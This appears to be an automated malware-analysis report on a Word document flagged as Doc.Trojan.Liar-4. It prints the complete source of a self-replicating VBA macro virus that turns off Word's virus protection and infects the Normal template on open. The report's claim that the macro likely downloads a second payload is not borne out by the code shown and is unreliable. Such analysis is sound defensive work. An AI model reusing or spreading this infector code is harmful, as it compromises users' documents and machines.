MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro appears to be obfuscated and attempts to modify the Normal template or the active document, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Liar-4' further confirms its malicious nature.
Heuristics 3
- ClamAV: Doc.Trojan.Liar-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Liar-4
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2029 bytes |

SHA-256: 35c4d17d3ae5e15feddb68dc07ae671964702b36a9f983c6d60951d872628242
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' Class.Beg to differ
Private Sub Document_Open() '
Dim v(200): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
If MacroContainer = s Then Set s = ActiveDocument '
Set nh = s.VBProject.VBComponents(1).CodeModule: li = abc.countoflines: y = 100 + Int(Rnd * 50) '
For i = 1 To li: jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
If p = 1 And li > y Then '
d = 1: GoTo n_ '
End If '
l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l): f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f: Next o '
For j = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
If nh.countoflines < (1 + 1 + 2) Then '
nh.deletelines 1, nh.countoflines: nh.addfromstring vc: nh.deletelines nh.countoflines, 1 '
If s = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName '
If Day(Now()) = 16 Then beg_to_differ '
End If '
End Sub '
Private Sub beg_to_differ() '
beg = "do you see what I see?" & vbCr '
beg = beg & "do you hear what I hear?" & vbCr '
beg = beg & "do you feel what I feel?" & vbCr '
beg = beg & "do you ever care?" & vbCr '
beg = beg & "I...beg to differ!" & vbCr '
beg = beg & "beg to differ!" & vbCr & vbCr '
beg = beg & "jackie twoflower/Lz0NT/MVT" '
MsgBox beg, 0, "class.beg to differ" '
End Sub '
Rem Dedicated to Darkman/29A '
```